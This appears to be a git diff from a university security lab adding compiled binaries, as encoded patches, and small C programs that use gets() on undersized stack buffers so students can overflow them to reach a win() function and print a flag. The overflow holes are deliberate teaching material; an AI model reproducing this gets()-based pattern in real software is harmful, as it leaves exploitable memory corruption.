zZpj&$ndbT}12>PDBb$d!MiUn(WA_@qee=N08;35G$Pc1mVaqf}ZuBhNIJ`xe8#diC
zIIzjQW&QfCBV*>+z#yUrD9X>M$+9cEEkC~Y_Xj_vBIb-^Q#XrAd`)l*JLBVfyzjO_
zJ$~5@V)fxR$T6){!bzY(67_9XehR)o=fV%S&@J00K18JQ>g(?Xy4e2Y9;`kstB=PQ
zD9rvs{0TyiTSh9<Qc!`XD(_o!kZq>&2;i{oCJ+O{*G?{J7IWC^(?v78+uNEis9=tl
z%ieJP*hq#&ra5-=koRom_w8UUel@X^L5_%*Cnpd=fI1~bvwjI-oK-4{cmZKfd|+^6
zr-M&I3gM6tA9r*3D~Mc5#EG(ra#qAslLgpQ6!C?W;44uXA80NBCS({d^;MymcSKye
zERJG4V*@%2)#9A?(6QxXj$2u8qGwYu;UiU5&3IMAFQb9PL@tTOZHJc8HBOf}yeHy#
z?I!RlfoF}o8C2o7Dex7{71Fj}PK=M2tX)3BCnd`-!&&|U@PDA(k-3C%*^qxf1Aw#P
zO!Al0%fVsvLp}L-E)W<f`-$rvQxCGQ$GGcZ=(S6U`tkLK0YAchBJD9A`<`b{MPS$i
z!Drr#%&3WajMH9&9y`p)j791&3c3xM(Vf)8o#<;Q90K+eb(!u)=6xph7}wp2N(Rb)
zyW}(PMCSb`%Z&H#_4I=6LL~MgGwP!r<G{nvV^rkZWB<5VSCFYUh|D|JXQ8(pW$NK(
zL5_oZynbR|*$&tF7z|vFvY%*==^<oakMU$T1V<_G5`9A5FC+VUj5AMx=>-!~lV#>V
z3+T!H3?1Y3j-OPdDa1DddffM0QCUTiO4IM(w>>@jh5O-h=!Mx4FZp_Z1xz;e<ljfZ
zNn@T4iLdtp%Dx`s+kMc>euBN@&|?h9t}~93e>a7)pJ<Qy$H@HKCh9RBivsv<fhEht
zjKBCSsK+>se+O3ecpy@b{(Bsm-Ju@i=hM(*Z0aY!UDoyWWE=;__W4SnzTSrcJ;qag
z&|^D(^85N5Fvw@Sj4S$~=gX+;yNGvdEO(QMM7=9jQT|fKT!$Z0Kjolj_yE+Gwa(Hz
z0KK+A!@iy|OYb|FEc{zNKl#P@EWL9$iY)Mjfp&RIOSV6b`FMG*=HR_VnV&hQ{M3)5
tNH^wm8yH-p*j02{zLSCKqIj7Q@*Wm4CfZ_R>=x8(TPDPaFNDl5{x3w1kq-a>

literal 0
HcmV?d00001

diff --git a/pa/lab6/functions.c b/pa/lab6/functions.c
new file mode 100644
index 0000000..9603c36
--- /dev/null
+++ b/pa/lab6/functions.c
@@ -0,0 +1,27 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+void win() {
+  printf("Congratulations, you win!!! You successfully changed the code flow\n");
+  printf("Flag: %s\n", getflag());
+}
+
+int main() {
+  init();
+  int (*fp)();
+  char buffer[32];
+
+  fp = 0;
+
+  printf("You win this game if you are able to call the function win. Can you do it?\n");
+
+  gets(buffer);
+
+  if(fp) {
+      printf("Calling function pointer... jumping to %p\n", fp);
+      fp();
+  }
+}
diff --git a/pa/lab6/match.c b/pa/lab6/match.c
new file mode 100644
index 0000000..c81ef9f
--- /dev/null
+++ b/pa/lab6/match.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+int main() {
+  init();
+  int test;
+  char buffer[64];
+
+  printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
+
+  test = 0;
+  gets(buffer);
+
+  if (test == 0x61626364) {
+      printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
+      printf("Flag: %s\n", getflag());
+  } else {
+      printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
+  }
+}
diff --git a/pa/lab6/return b/pa/lab6/return
new file mode 100644
index 0000000000000000000000000000000000000000..b6e261736084c2e5eb3d3733e0fce10063102ead
GIT binary patch
literal 10552
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
HohtqhTgITd

literal 0
HcmV?d00001

diff --git a/pa/lab6/return.c b/pa/lab6/return.c
new file mode 100644
index 0000000..2297db0
--- /dev/null
+++ b/pa/lab6/return.c
@@ -0,0 +1,22 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+void win() {
+  printf("Congratulations, you win!!! You successfully changed the code flow\n");
+  printf("Flag, %s\n", getflag());
+}
+
+void challenge() {
+  char buffer[10];
+  printf("You win this game if you are able to call the function win.'\n");
+  gets(buffer);
+}
+ 
+int main() {
+  init();
+  challenge();
+  return 0;
+}
diff --git a/pa/lab6/simple b/pa/lab6/simple
new file mode 100755
index 0000000000000000000000000000000000000000..99a5b92e94135e01d0ef2f93933e650bddbd3db4
GIT binary patch
literal 10368
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
QX7l5I215f{37szfFVn9{j{pDw

literal 0
HcmV?d00001

diff --git a/pa/lab6/simple.c b/pa/lab6/simple.c
new file mode 100644
index 0000000..f3d81d4
--- /dev/null
